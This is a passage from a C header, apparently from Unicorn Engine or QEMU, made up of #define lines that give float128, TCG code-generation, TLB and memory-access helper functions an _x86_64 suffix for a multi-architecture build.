float128_to_int32_round_to_zero float128_to_int32_round_to_zero_x86_64 #define float128_to_int64 float128_to_int64_x86_64 #define float128_to_int64_round_to_zero float128_to_int64_round_to_zero_x86_64 #define float128_to_uint64 float128_to_uint64_x86_64 #define float128_to_uint64_round_to_zero float128_to_uint64_round_to_zero_x86_64 #define float128_to_uint32_round_to_zero float128_to_uint32_round_to_zero_x86_64 #define float128_to_uint32 float128_to_uint32_x86_64 #define float128_to_float32 float128_to_float32_x86_64 #define float128_to_float64 float128_to_float64_x86_64 #define float128_to_floatx80 float128_to_floatx80_x86_64 #define float128_round_to_int float128_round_to_int_x86_64 #define float128_add float128_add_x86_64 #define float128_sub float128_sub_x86_64 #define float128_mul float128_mul_x86_64 #define float128_div float128_div_x86_64 #define float128_rem float128_rem_x86_64 #define float128_sqrt float128_sqrt_x86_64 #define float128_eq float128_eq_x86_64 #define float128_le float128_le_x86_64 #define float128_lt float128_lt_x86_64 #define float128_unordered float128_unordered_x86_64 #define float128_eq_quiet float128_eq_quiet_x86_64 #define float128_le_quiet float128_le_quiet_x86_64 #define float128_lt_quiet float128_lt_quiet_x86_64 #define float128_unordered_quiet float128_unordered_quiet_x86_64 #define floatx80_compare floatx80_compare_x86_64 #define floatx80_compare_quiet floatx80_compare_quiet_x86_64 #define float128_compare float128_compare_x86_64 #define float128_compare_quiet float128_compare_quiet_x86_64 #define floatx80_scalbn floatx80_scalbn_x86_64 #define float128_scalbn float128_scalbn_x86_64 #define softfloat_init softfloat_init_x86_64 #define tcg_optimize tcg_optimize_x86_64 #define gen_new_label gen_new_label_x86_64 #define tcg_can_emit_vec_op tcg_can_emit_vec_op_x86_64 #define tcg_expand_vec_op tcg_expand_vec_op_x86_64 #define tcg_register_jit tcg_register_jit_x86_64 #define tcg_tb_insert tcg_tb_insert_x86_64 #define tcg_tb_remove tcg_tb_remove_x86_64 #define tcg_tb_lookup tcg_tb_lookup_x86_64 #define tcg_tb_foreach tcg_tb_foreach_x86_64 #define tcg_nb_tbs tcg_nb_tbs_x86_64 #define tcg_region_reset_all tcg_region_reset_all_x86_64 #define tcg_region_init tcg_region_init_x86_64 #define tcg_code_size tcg_code_size_x86_64 #define tcg_code_capacity tcg_code_capacity_x86_64 #define tcg_tb_phys_invalidate_count tcg_tb_phys_invalidate_count_x86_64 #define tcg_malloc_internal tcg_malloc_internal_x86_64 #define tcg_pool_reset tcg_pool_reset_x86_64 #define tcg_context_init tcg_context_init_x86_64 #define tcg_tb_alloc tcg_tb_alloc_x86_64 #define tcg_prologue_init tcg_prologue_init_x86_64 #define tcg_func_start tcg_func_start_x86_64 #define tcg_set_frame tcg_set_frame_x86_64 #define tcg_global_mem_new_internal tcg_global_mem_new_internal_x86_64 #define tcg_temp_new_internal tcg_temp_new_internal_x86_64 #define tcg_temp_new_vec tcg_temp_new_vec_x86_64 #define tcg_temp_new_vec_matching tcg_temp_new_vec_matching_x86_64 #define tcg_temp_free_internal tcg_temp_free_internal_x86_64 #define tcg_const_i32 tcg_const_i32_x86_64 #define tcg_const_i64 tcg_const_i64_x86_64 #define tcg_const_local_i32 tcg_const_local_i32_x86_64 #define tcg_const_local_i64 tcg_const_local_i64_x86_64 #define tcg_op_supported tcg_op_supported_x86_64 #define tcg_gen_callN tcg_gen_callN_x86_64 #define tcg_op_remove tcg_op_remove_x86_64 #define tcg_emit_op tcg_emit_op_x86_64 #define tcg_op_insert_before tcg_op_insert_before_x86_64 #define tcg_op_insert_after tcg_op_insert_after_x86_64 #define tcg_cpu_exec_time tcg_cpu_exec_time_x86_64 #define tcg_gen_code tcg_gen_code_x86_64 #define tcg_gen_op1 tcg_gen_op1_x86_64 #define tcg_gen_op2 tcg_gen_op2_x86_64 #define tcg_gen_op3 tcg_gen_op3_x86_64 #define tcg_gen_op4 tcg_gen_op4_x86_64 #define tcg_gen_op5 tcg_gen_op5_x86_64 #define tcg_gen_op6 tcg_gen_op6_x86_64 #define tcg_gen_mb tcg_gen_mb_x86_64 #define tcg_gen_addi_i32 tcg_gen_addi_i32_x86_64 #define tcg_gen_subfi_i32 tcg_gen_subfi_i32_x86_64 #define tcg_gen_subi_i32 tcg_gen_subi_i32_x86_64 #define tcg_gen_andi_i32 tcg_gen_andi_i32_x86_64 #define tcg_gen_ori_i32 tcg_gen_ori_i32_x86_64 #define tcg_gen_xori_i32 tcg_gen_xori_i32_x86_64 #define tcg_gen_shli_i32 tcg_gen_shli_i32_x86_64 #define tcg_gen_shri_i32 tcg_gen_shri_i32_x86_64 #define tcg_gen_sari_i32 tcg_gen_sari_i32_x86_64 #define tcg_gen_brcond_i32 tcg_gen_brcond_i32_x86_64 #define tcg_gen_brcondi_i32 tcg_gen_brcondi_i32_x86_64 #define tcg_gen_setcond_i32 tcg_gen_setcond_i32_x86_64 #define tcg_gen_setcondi_i32 tcg_gen_setcondi_i32_x86_64 #define tcg_gen_muli_i32 tcg_gen_muli_i32_x86_64 #define tcg_gen_div_i32 tcg_gen_div_i32_x86_64 #define tcg_gen_rem_i32 tcg_gen_rem_i32_x86_64 #define tcg_gen_divu_i32 tcg_gen_divu_i32_x86_64 #define tcg_gen_remu_i32 tcg_gen_remu_i32_x86_64 #define tcg_gen_andc_i32 tcg_gen_andc_i32_x86_64 #define tcg_gen_eqv_i32 tcg_gen_eqv_i32_x86_64 #define tcg_gen_nand_i32 tcg_gen_nand_i32_x86_64 #define tcg_gen_nor_i32 tcg_gen_nor_i32_x86_64 #define tcg_gen_orc_i32 tcg_gen_orc_i32_x86_64 #define tcg_gen_clz_i32 tcg_gen_clz_i32_x86_64 #define tcg_gen_clzi_i32 tcg_gen_clzi_i32_x86_64 #define tcg_gen_ctz_i32 tcg_gen_ctz_i32_x86_64 #define tcg_gen_ctzi_i32 tcg_gen_ctzi_i32_x86_64 #define tcg_gen_clrsb_i32 tcg_gen_clrsb_i32_x86_64 #define tcg_gen_ctpop_i32 tcg_gen_ctpop_i32_x86_64 #define tcg_gen_rotl_i32 tcg_gen_rotl_i32_x86_64 #define tcg_gen_rotli_i32 tcg_gen_rotli_i32_x86_64 #define tcg_gen_rotr_i32 tcg_gen_rotr_i32_x86_64 #define tcg_gen_rotri_i32 tcg_gen_rotri_i32_x86_64 #define tcg_gen_deposit_i32 tcg_gen_deposit_i32_x86_64 #define tcg_gen_deposit_z_i32 tcg_gen_deposit_z_i32_x86_64 #define tcg_gen_extract_i32 tcg_gen_extract_i32_x86_64 #define tcg_gen_sextract_i32 tcg_gen_sextract_i32_x86_64 #define tcg_gen_extract2_i32 tcg_gen_extract2_i32_x86_64 #define tcg_gen_movcond_i32 tcg_gen_movcond_i32_x86_64 #define tcg_gen_add2_i32 tcg_gen_add2_i32_x86_64 #define tcg_gen_sub2_i32 tcg_gen_sub2_i32_x86_64 #define tcg_gen_mulu2_i32 tcg_gen_mulu2_i32_x86_64 #define tcg_gen_muls2_i32 tcg_gen_muls2_i32_x86_64 #define tcg_gen_mulsu2_i32 tcg_gen_mulsu2_i32_x86_64 #define tcg_gen_ext8s_i32 tcg_gen_ext8s_i32_x86_64 #define tcg_gen_ext16s_i32 tcg_gen_ext16s_i32_x86_64 #define tcg_gen_ext8u_i32 tcg_gen_ext8u_i32_x86_64 #define tcg_gen_ext16u_i32 tcg_gen_ext16u_i32_x86_64 #define tcg_gen_bswap16_i32 tcg_gen_bswap16_i32_x86_64 #define tcg_gen_bswap32_i32 tcg_gen_bswap32_i32_x86_64 #define tcg_gen_smin_i32 tcg_gen_smin_i32_x86_64 #define tcg_gen_umin_i32 tcg_gen_umin_i32_x86_64 #define tcg_gen_smax_i32 tcg_gen_smax_i32_x86_64 #define tcg_gen_umax_i32 tcg_gen_umax_i32_x86_64 #define tcg_gen_abs_i32 tcg_gen_abs_i32_x86_64 #define tcg_gen_addi_i64 tcg_gen_addi_i64_x86_64 #define tcg_gen_subfi_i64 tcg_gen_subfi_i64_x86_64 #define tcg_gen_subi_i64 tcg_gen_subi_i64_x86_64 #define tcg_gen_andi_i64 tcg_gen_andi_i64_x86_64 #define tcg_gen_ori_i64 tcg_gen_ori_i64_x86_64 #define tcg_gen_xori_i64 tcg_gen_xori_i64_x86_64 #define tcg_gen_shli_i64 tcg_gen_shli_i64_x86_64 #define tcg_gen_shri_i64 tcg_gen_shri_i64_x86_64 #define tcg_gen_sari_i64 tcg_gen_sari_i64_x86_64 #define tcg_gen_brcond_i64 tcg_gen_brcond_i64_x86_64 #define tcg_gen_brcondi_i64 tcg_gen_brcondi_i64_x86_64 #define tcg_gen_setcond_i64 tcg_gen_setcond_i64_x86_64 #define tcg_gen_setcondi_i64 tcg_gen_setcondi_i64_x86_64 #define tcg_gen_muli_i64 tcg_gen_muli_i64_x86_64 #define tcg_gen_div_i64 tcg_gen_div_i64_x86_64 #define tcg_gen_rem_i64 tcg_gen_rem_i64_x86_64 #define tcg_gen_divu_i64 tcg_gen_divu_i64_x86_64 #define tcg_gen_remu_i64 tcg_gen_remu_i64_x86_64 #define tcg_gen_ext8s_i64 tcg_gen_ext8s_i64_x86_64 #define tcg_gen_ext16s_i64 tcg_gen_ext16s_i64_x86_64 #define tcg_gen_ext32s_i64 tcg_gen_ext32s_i64_x86_64 #define tcg_gen_ext8u_i64 tcg_gen_ext8u_i64_x86_64 #define tcg_gen_ext16u_i64 tcg_gen_ext16u_i64_x86_64 #define tcg_gen_ext32u_i64 tcg_gen_ext32u_i64_x86_64 #define tcg_gen_bswap16_i64 tcg_gen_bswap16_i64_x86_64 #define tcg_gen_bswap32_i64 tcg_gen_bswap32_i64_x86_64 #define tcg_gen_bswap64_i64 tcg_gen_bswap64_i64_x86_64 #define tcg_gen_not_i64 tcg_gen_not_i64_x86_64 #define tcg_gen_andc_i64 tcg_gen_andc_i64_x86_64 #define tcg_gen_eqv_i64 tcg_gen_eqv_i64_x86_64 #define tcg_gen_nand_i64 tcg_gen_nand_i64_x86_64 #define tcg_gen_nor_i64 tcg_gen_nor_i64_x86_64 #define tcg_gen_orc_i64 tcg_gen_orc_i64_x86_64 #define tcg_gen_clz_i64 tcg_gen_clz_i64_x86_64 #define tcg_gen_clzi_i64 tcg_gen_clzi_i64_x86_64 #define tcg_gen_ctz_i64 tcg_gen_ctz_i64_x86_64 #define tcg_gen_ctzi_i64 tcg_gen_ctzi_i64_x86_64 #define tcg_gen_clrsb_i64 tcg_gen_clrsb_i64_x86_64 #define tcg_gen_ctpop_i64 tcg_gen_ctpop_i64_x86_64 #define tcg_gen_rotl_i64 tcg_gen_rotl_i64_x86_64 #define tcg_gen_rotli_i64 tcg_gen_rotli_i64_x86_64 #define tcg_gen_rotr_i64 tcg_gen_rotr_i64_x86_64 #define tcg_gen_rotri_i64 tcg_gen_rotri_i64_x86_64 #define tcg_gen_deposit_i64 tcg_gen_deposit_i64_x86_64 #define tcg_gen_deposit_z_i64 tcg_gen_deposit_z_i64_x86_64 #define tcg_gen_extract_i64 tcg_gen_extract_i64_x86_64 #define tcg_gen_sextract_i64 tcg_gen_sextract_i64_x86_64 #define tcg_gen_extract2_i64 tcg_gen_extract2_i64_x86_64 #define tcg_gen_movcond_i64 tcg_gen_movcond_i64_x86_64 #define tcg_gen_add2_i64 tcg_gen_add2_i64_x86_64 #define tcg_gen_sub2_i64 tcg_gen_sub2_i64_x86_64 #define tcg_gen_mulu2_i64 tcg_gen_mulu2_i64_x86_64 #define tcg_gen_muls2_i64 tcg_gen_muls2_i64_x86_64 #define tcg_gen_mulsu2_i64 tcg_gen_mulsu2_i64_x86_64 #define tcg_gen_smin_i64 tcg_gen_smin_i64_x86_64 #define tcg_gen_umin_i64 tcg_gen_umin_i64_x86_64 #define tcg_gen_smax_i64 tcg_gen_smax_i64_x86_64 #define tcg_gen_umax_i64 tcg_gen_umax_i64_x86_64 #define tcg_gen_abs_i64 tcg_gen_abs_i64_x86_64 #define tcg_gen_extrl_i64_i32 tcg_gen_extrl_i64_i32_x86_64 #define tcg_gen_extrh_i64_i32 tcg_gen_extrh_i64_i32_x86_64 #define tcg_gen_extu_i32_i64 tcg_gen_extu_i32_i64_x86_64 #define tcg_gen_ext_i32_i64 tcg_gen_ext_i32_i64_x86_64 #define tcg_gen_concat_i32_i64 tcg_gen_concat_i32_i64_x86_64 #define tcg_gen_extr_i64_i32 tcg_gen_extr_i64_i32_x86_64 #define tcg_gen_extr32_i64 tcg_gen_extr32_i64_x86_64 #define tcg_gen_exit_tb tcg_gen_exit_tb_x86_64 #define tcg_gen_goto_tb tcg_gen_goto_tb_x86_64 #define tcg_gen_lookup_and_goto_ptr tcg_gen_lookup_and_goto_ptr_x86_64 #define check_exit_request check_exit_request_x86_64 #define tcg_gen_qemu_ld_i32 tcg_gen_qemu_ld_i32_x86_64 #define tcg_gen_qemu_st_i32 tcg_gen_qemu_st_i32_x86_64 #define tcg_gen_qemu_ld_i64 tcg_gen_qemu_ld_i64_x86_64 #define tcg_gen_qemu_st_i64 tcg_gen_qemu_st_i64_x86_64 #define tcg_gen_atomic_cmpxchg_i32 tcg_gen_atomic_cmpxchg_i32_x86_64 #define tcg_gen_atomic_cmpxchg_i64 tcg_gen_atomic_cmpxchg_i64_x86_64 #define tcg_gen_atomic_fetch_add_i32 tcg_gen_atomic_fetch_add_i32_x86_64 #define tcg_gen_atomic_fetch_add_i64 tcg_gen_atomic_fetch_add_i64_x86_64 #define tcg_gen_atomic_fetch_and_i32 tcg_gen_atomic_fetch_and_i32_x86_64 #define tcg_gen_atomic_fetch_and_i64 tcg_gen_atomic_fetch_and_i64_x86_64 #define tcg_gen_atomic_fetch_or_i32 tcg_gen_atomic_fetch_or_i32_x86_64 #define tcg_gen_atomic_fetch_or_i64 tcg_gen_atomic_fetch_or_i64_x86_64 #define tcg_gen_atomic_fetch_xor_i32 tcg_gen_atomic_fetch_xor_i32_x86_64 #define tcg_gen_atomic_fetch_xor_i64 tcg_gen_atomic_fetch_xor_i64_x86_64 #define tcg_gen_atomic_fetch_smin_i32 tcg_gen_atomic_fetch_smin_i32_x86_64 #define tcg_gen_atomic_fetch_smin_i64 tcg_gen_atomic_fetch_smin_i64_x86_64 #define tcg_gen_atomic_fetch_umin_i32 tcg_gen_atomic_fetch_umin_i32_x86_64 #define tcg_gen_atomic_fetch_umin_i64 tcg_gen_atomic_fetch_umin_i64_x86_64 #define tcg_gen_atomic_fetch_smax_i32 tcg_gen_atomic_fetch_smax_i32_x86_64 #define tcg_gen_atomic_fetch_smax_i64 tcg_gen_atomic_fetch_smax_i64_x86_64 #define tcg_gen_atomic_fetch_umax_i32 tcg_gen_atomic_fetch_umax_i32_x86_64 #define tcg_gen_atomic_fetch_umax_i64 tcg_gen_atomic_fetch_umax_i64_x86_64 #define tcg_gen_atomic_add_fetch_i32 tcg_gen_atomic_add_fetch_i32_x86_64 #define tcg_gen_atomic_add_fetch_i64 tcg_gen_atomic_add_fetch_i64_x86_64 #define tcg_gen_atomic_and_fetch_i32 tcg_gen_atomic_and_fetch_i32_x86_64 #define tcg_gen_atomic_and_fetch_i64 tcg_gen_atomic_and_fetch_i64_x86_64 #define tcg_gen_atomic_or_fetch_i32 tcg_gen_atomic_or_fetch_i32_x86_64 #define tcg_gen_atomic_or_fetch_i64 tcg_gen_atomic_or_fetch_i64_x86_64 #define tcg_gen_atomic_xor_fetch_i32 tcg_gen_atomic_xor_fetch_i32_x86_64 #define tcg_gen_atomic_xor_fetch_i64 tcg_gen_atomic_xor_fetch_i64_x86_64 #define tcg_gen_atomic_smin_fetch_i32 tcg_gen_atomic_smin_fetch_i32_x86_64 #define tcg_gen_atomic_smin_fetch_i64 tcg_gen_atomic_smin_fetch_i64_x86_64 #define tcg_gen_atomic_umin_fetch_i32 tcg_gen_atomic_umin_fetch_i32_x86_64 #define tcg_gen_atomic_umin_fetch_i64 tcg_gen_atomic_umin_fetch_i64_x86_64 #define tcg_gen_atomic_smax_fetch_i32 tcg_gen_atomic_smax_fetch_i32_x86_64 #define tcg_gen_atomic_smax_fetch_i64 tcg_gen_atomic_smax_fetch_i64_x86_64 #define tcg_gen_atomic_umax_fetch_i32 tcg_gen_atomic_umax_fetch_i32_x86_64 #define tcg_gen_atomic_umax_fetch_i64 tcg_gen_atomic_umax_fetch_i64_x86_64 #define tcg_gen_atomic_xchg_i32 tcg_gen_atomic_xchg_i32_x86_64 #define tcg_gen_atomic_xchg_i64 tcg_gen_atomic_xchg_i64_x86_64 #define simd_desc simd_desc_x86_64 #define tcg_gen_gvec_2_ool tcg_gen_gvec_2_ool_x86_64 #define tcg_gen_gvec_2i_ool tcg_gen_gvec_2i_ool_x86_64 #define tcg_gen_gvec_3_ool tcg_gen_gvec_3_ool_x86_64 #define tcg_gen_gvec_4_ool tcg_gen_gvec_4_ool_x86_64 #define tcg_gen_gvec_5_ool tcg_gen_gvec_5_ool_x86_64 #define tcg_gen_gvec_2_ptr tcg_gen_gvec_2_ptr_x86_64 #define tcg_gen_gvec_3_ptr tcg_gen_gvec_3_ptr_x86_64 #define tcg_gen_gvec_4_ptr tcg_gen_gvec_4_ptr_x86_64 #define tcg_gen_gvec_5_ptr tcg_gen_gvec_5_ptr_x86_64 #define tcg_gen_gvec_2 tcg_gen_gvec_2_x86_64 #define tcg_gen_gvec_2i tcg_gen_gvec_2i_x86_64 #define tcg_gen_gvec_2s tcg_gen_gvec_2s_x86_64 #define tcg_gen_gvec_3 tcg_gen_gvec_3_x86_64 #define tcg_gen_gvec_3i tcg_gen_gvec_3i_x86_64 #define tcg_gen_gvec_4 tcg_gen_gvec_4_x86_64 #define tcg_gen_gvec_mov tcg_gen_gvec_mov_x86_64 #define tcg_gen_gvec_dup_i32 tcg_gen_gvec_dup_i32_x86_64 #define tcg_gen_gvec_dup_i64 tcg_gen_gvec_dup_i64_x86_64 #define tcg_gen_gvec_dup_mem tcg_gen_gvec_dup_mem_x86_64 #define tcg_gen_gvec_dup64i tcg_gen_gvec_dup64i_x86_64 #define tcg_gen_gvec_dup32i tcg_gen_gvec_dup32i_x86_64 #define tcg_gen_gvec_dup16i tcg_gen_gvec_dup16i_x86_64 #define tcg_gen_gvec_dup8i tcg_gen_gvec_dup8i_x86_64 #define tcg_gen_gvec_not tcg_gen_gvec_not_x86_64 #define tcg_gen_vec_add8_i64 tcg_gen_vec_add8_i64_x86_64 #define tcg_gen_vec_add16_i64 tcg_gen_vec_add16_i64_x86_64 #define tcg_gen_vec_add32_i64 tcg_gen_vec_add32_i64_x86_64 #define tcg_gen_gvec_add tcg_gen_gvec_add_x86_64 #define tcg_gen_gvec_adds tcg_gen_gvec_adds_x86_64 #define tcg_gen_gvec_addi tcg_gen_gvec_addi_x86_64 #define tcg_gen_gvec_subs tcg_gen_gvec_subs_x86_64 #define tcg_gen_vec_sub8_i64 tcg_gen_vec_sub8_i64_x86_64 #define tcg_gen_vec_sub16_i64 tcg_gen_vec_sub16_i64_x86_64 #define tcg_gen_vec_sub32_i64 tcg_gen_vec_sub32_i64_x86_64 #define tcg_gen_gvec_sub tcg_gen_gvec_sub_x86_64 #define tcg_gen_gvec_mul tcg_gen_gvec_mul_x86_64 #define tcg_gen_gvec_muls tcg_gen_gvec_muls_x86_64 #define tcg_gen_gvec_muli tcg_gen_gvec_muli_x86_64 #define tcg_gen_gvec_ssadd tcg_gen_gvec_ssadd_x86_64 #define tcg_gen_gvec_sssub tcg_gen_gvec_sssub_x86_64 #define tcg_gen_gvec_usadd tcg_gen_gvec_usadd_x86_64 #define tcg_gen_gvec_ussub tcg_gen_gvec_ussub_x86_64 #define tcg_gen_gvec_smin tcg_gen_gvec_smin_x86_64 #define tcg_gen_gvec_umin tcg_gen_gvec_umin_x86_64 #define tcg_gen_gvec_smax tcg_gen_gvec_smax_x86_64 #define tcg_gen_gvec_umax tcg_gen_gvec_umax_x86_64 #define tcg_gen_vec_neg8_i64 tcg_gen_vec_neg8_i64_x86_64 #define tcg_gen_vec_neg16_i64 tcg_gen_vec_neg16_i64_x86_64 #define tcg_gen_vec_neg32_i64 tcg_gen_vec_neg32_i64_x86_64 #define tcg_gen_gvec_neg tcg_gen_gvec_neg_x86_64 #define tcg_gen_gvec_abs tcg_gen_gvec_abs_x86_64 #define tcg_gen_gvec_and tcg_gen_gvec_and_x86_64 #define tcg_gen_gvec_or tcg_gen_gvec_or_x86_64 #define tcg_gen_gvec_xor tcg_gen_gvec_xor_x86_64 #define tcg_gen_gvec_andc tcg_gen_gvec_andc_x86_64 #define tcg_gen_gvec_orc tcg_gen_gvec_orc_x86_64 #define tcg_gen_gvec_nand tcg_gen_gvec_nand_x86_64 #define tcg_gen_gvec_nor tcg_gen_gvec_nor_x86_64 #define tcg_gen_gvec_eqv tcg_gen_gvec_eqv_x86_64 #define tcg_gen_gvec_ands tcg_gen_gvec_ands_x86_64 #define tcg_gen_gvec_andi tcg_gen_gvec_andi_x86_64 #define tcg_gen_gvec_xors tcg_gen_gvec_xors_x86_64 #define tcg_gen_gvec_xori tcg_gen_gvec_xori_x86_64 #define tcg_gen_gvec_ors tcg_gen_gvec_ors_x86_64 #define tcg_gen_gvec_ori tcg_gen_gvec_ori_x86_64 #define tcg_gen_vec_shl8i_i64 tcg_gen_vec_shl8i_i64_x86_64 #define tcg_gen_vec_shl16i_i64 tcg_gen_vec_shl16i_i64_x86_64 #define tcg_gen_gvec_shli tcg_gen_gvec_shli_x86_64 #define tcg_gen_vec_shr8i_i64 tcg_gen_vec_shr8i_i64_x86_64 #define tcg_gen_vec_shr16i_i64 tcg_gen_vec_shr16i_i64_x86_64 #define tcg_gen_gvec_shri tcg_gen_gvec_shri_x86_64 #define tcg_gen_vec_sar8i_i64 tcg_gen_vec_sar8i_i64_x86_64 #define tcg_gen_vec_sar16i_i64 tcg_gen_vec_sar16i_i64_x86_64 #define tcg_gen_gvec_sari tcg_gen_gvec_sari_x86_64 #define tcg_gen_gvec_shls tcg_gen_gvec_shls_x86_64 #define tcg_gen_gvec_shrs tcg_gen_gvec_shrs_x86_64 #define tcg_gen_gvec_sars tcg_gen_gvec_sars_x86_64 #define tcg_gen_gvec_shlv tcg_gen_gvec_shlv_x86_64 #define tcg_gen_gvec_shrv tcg_gen_gvec_shrv_x86_64 #define tcg_gen_gvec_sarv tcg_gen_gvec_sarv_x86_64 #define tcg_gen_gvec_cmp tcg_gen_gvec_cmp_x86_64 #define tcg_gen_gvec_bitsel tcg_gen_gvec_bitsel_x86_64 #define tcg_can_emit_vecop_list tcg_can_emit_vecop_list_x86_64 #define vec_gen_2 vec_gen_2_x86_64 #define vec_gen_3 vec_gen_3_x86_64 #define vec_gen_4 vec_gen_4_x86_64 #define tcg_gen_mov_vec tcg_gen_mov_vec_x86_64 #define tcg_const_zeros_vec tcg_const_zeros_vec_x86_64 #define tcg_const_ones_vec tcg_const_ones_vec_x86_64 #define tcg_const_zeros_vec_matching tcg_const_zeros_vec_matching_x86_64 #define tcg_const_ones_vec_matching tcg_const_ones_vec_matching_x86_64 #define tcg_gen_dup64i_vec tcg_gen_dup64i_vec_x86_64 #define tcg_gen_dup32i_vec tcg_gen_dup32i_vec_x86_64 #define tcg_gen_dup16i_vec tcg_gen_dup16i_vec_x86_64 #define tcg_gen_dup8i_vec tcg_gen_dup8i_vec_x86_64 #define tcg_gen_dupi_vec tcg_gen_dupi_vec_x86_64 #define tcg_gen_dup_i64_vec tcg_gen_dup_i64_vec_x86_64 #define tcg_gen_dup_i32_vec tcg_gen_dup_i32_vec_x86_64 #define tcg_gen_dup_mem_vec tcg_gen_dup_mem_vec_x86_64 #define tcg_gen_ld_vec tcg_gen_ld_vec_x86_64 #define tcg_gen_st_vec tcg_gen_st_vec_x86_64 #define tcg_gen_stl_vec tcg_gen_stl_vec_x86_64 #define tcg_gen_and_vec tcg_gen_and_vec_x86_64 #define tcg_gen_or_vec tcg_gen_or_vec_x86_64 #define tcg_gen_xor_vec tcg_gen_xor_vec_x86_64 #define tcg_gen_andc_vec tcg_gen_andc_vec_x86_64 #define tcg_gen_orc_vec tcg_gen_orc_vec_x86_64 #define tcg_gen_nand_vec tcg_gen_nand_vec_x86_64 #define tcg_gen_nor_vec tcg_gen_nor_vec_x86_64 #define tcg_gen_eqv_vec tcg_gen_eqv_vec_x86_64 #define tcg_gen_not_vec tcg_gen_not_vec_x86_64 #define tcg_gen_neg_vec tcg_gen_neg_vec_x86_64 #define tcg_gen_abs_vec tcg_gen_abs_vec_x86_64 #define tcg_gen_shli_vec tcg_gen_shli_vec_x86_64 #define tcg_gen_shri_vec tcg_gen_shri_vec_x86_64 #define tcg_gen_sari_vec tcg_gen_sari_vec_x86_64 #define tcg_gen_cmp_vec tcg_gen_cmp_vec_x86_64 #define tcg_gen_add_vec tcg_gen_add_vec_x86_64 #define tcg_gen_sub_vec tcg_gen_sub_vec_x86_64 #define tcg_gen_mul_vec tcg_gen_mul_vec_x86_64 #define tcg_gen_ssadd_vec tcg_gen_ssadd_vec_x86_64 #define tcg_gen_usadd_vec tcg_gen_usadd_vec_x86_64 #define tcg_gen_sssub_vec tcg_gen_sssub_vec_x86_64 #define tcg_gen_ussub_vec tcg_gen_ussub_vec_x86_64 #define tcg_gen_smin_vec tcg_gen_smin_vec_x86_64 #define tcg_gen_umin_vec tcg_gen_umin_vec_x86_64 #define tcg_gen_smax_vec tcg_gen_smax_vec_x86_64 #define tcg_gen_umax_vec tcg_gen_umax_vec_x86_64 #define tcg_gen_shlv_vec tcg_gen_shlv_vec_x86_64 #define tcg_gen_shrv_vec tcg_gen_shrv_vec_x86_64 #define tcg_gen_sarv_vec tcg_gen_sarv_vec_x86_64 #define tcg_gen_shls_vec tcg_gen_shls_vec_x86_64 #define tcg_gen_shrs_vec tcg_gen_shrs_vec_x86_64 #define tcg_gen_sars_vec tcg_gen_sars_vec_x86_64 #define tcg_gen_bitsel_vec tcg_gen_bitsel_vec_x86_64 #define tcg_gen_cmpsel_vec tcg_gen_cmpsel_vec_x86_64 #define tb_htable_lookup tb_htable_lookup_x86_64 #define tb_set_jmp_target tb_set_jmp_target_x86_64 #define cpu_exec cpu_exec_x86_64 #define cpu_loop_exit_noexc cpu_loop_exit_noexc_x86_64 #define cpu_reloading_memory_map cpu_reloading_memory_map_x86_64 #define cpu_loop_exit cpu_loop_exit_x86_64 #define cpu_loop_exit_restore cpu_loop_exit_restore_x86_64 #define cpu_loop_exit_atomic cpu_loop_exit_atomic_x86_64 #define tlb_init tlb_init_x86_64 #define tlb_flush_by_mmuidx tlb_flush_by_mmuidx_x86_64 #define tlb_flush tlb_flush_x86_64 #define tlb_flush_by_mmuidx_all_cpus tlb_flush_by_mmuidx_all_cpus_x86_64 #define tlb_flush_all_cpus tlb_flush_all_cpus_x86_64 #define tlb_flush_by_mmuidx_all_cpus_synced tlb_flush_by_mmuidx_all_cpus_synced_x86_64 #define tlb_flush_all_cpus_synced tlb_flush_all_cpus_synced_x86_64 #define tlb_flush_page_by_mmuidx tlb_flush_page_by_mmuidx_x86_64 #define tlb_flush_page tlb_flush_page_x86_64 #define tlb_flush_page_by_mmuidx_all_cpus tlb_flush_page_by_mmuidx_all_cpus_x86_64 #define tlb_flush_page_all_cpus tlb_flush_page_all_cpus_x86_64 #define tlb_flush_page_by_mmuidx_all_cpus_synced tlb_flush_page_by_mmuidx_all_cpus_synced_x86_64 #define tlb_flush_page_all_cpus_synced tlb_flush_page_all_cpus_synced_x86_64 #define tlb_protect_code tlb_protect_code_x86_64 #define tlb_unprotect_code tlb_unprotect_code_x86_64 #define tlb_reset_dirty tlb_reset_dirty_x86_64 #define tlb_set_dirty tlb_set_dirty_x86_64 #define tlb_set_page_with_attrs tlb_set_page_with_attrs_x86_64 #define tlb_set_page tlb_set_page_x86_64 #define get_page_addr_code_hostp get_page_addr_code_hostp_x86_64 #define get_page_addr_code get_page_addr_code_x86_64 #define probe_access probe_access_x86_64 #define tlb_vaddr_to_host tlb_vaddr_to_host_x86_64 #define helper_ret_ldub_mmu helper_ret_ldub_mmu_x86_64 #define helper_le_lduw_mmu helper_le_lduw_mmu_x86_64 #define helper_be_lduw_mmu helper_be_lduw_mmu_x86_64 #define helper_le_ldul_mmu helper_le_ldul_mmu_x86_64 #define helper_be_ldul_mmu helper_be_ldul_mmu_x86_64 #define helper_le_ldq_mmu helper_le_ldq_mmu_x86_64 #define helper_be_ldq_mmu helper_be_ldq_mmu_x86_64 #define helper_ret_ldsb_mmu helper_ret_ldsb_mmu_x86_64 #define helper_le_ldsw_mmu helper_le_ldsw_mmu_x86_64 #define helper_be_ldsw_mmu helper_be_ldsw_mmu_x86_64 #define helper_le_ldsl_mmu helper_le_ldsl_mmu_x86_64 #define helper_be_ldsl_mmu helper_be_ldsl_mmu_x86_64 #define cpu_ldub_mmuidx_ra cpu_ldub_mmuidx_ra_x86_64 #define cpu_ldsb_mmuidx_ra cpu_ldsb_mmuidx_ra_x86_64 #define cpu_lduw_mmuidx_ra cpu_lduw_mmuidx_ra_x86_64 #define cpu_ldsw_mmuidx_ra cpu_ldsw_mmuidx_ra_x86_64 #define cpu_ldl_mmuidx_ra cpu_ldl_mmuidx_ra_x86_64 #define cpu_ldq_mmuidx_ra cpu_ldq_mmuidx_ra_x86_64 #define cpu_ldub_data_ra cpu_ldub_data_ra_x86_64 #define cpu_ldsb_data_ra cpu_ldsb_data_ra_x86_64 #define cpu_lduw_data_ra cpu_lduw_data_ra_x86_64 #define cpu_ldsw_data_ra cpu_ldsw_data_ra_x86_64 #define cpu_ldl_data_ra cpu_ldl_data_ra_x86_64 #define cpu_ldq_data_ra cpu_ldq_data_ra_x86_64 #define cpu_ldub_data cpu_ldub_data_x86_64 #define cpu_ldsb_data cpu_ldsb_data_x86_64 #define cpu_lduw_data cpu_lduw_data_x86_64 #define cpu_ldsw_data cpu_ldsw_data_x86_64 #define cpu_ldl_data 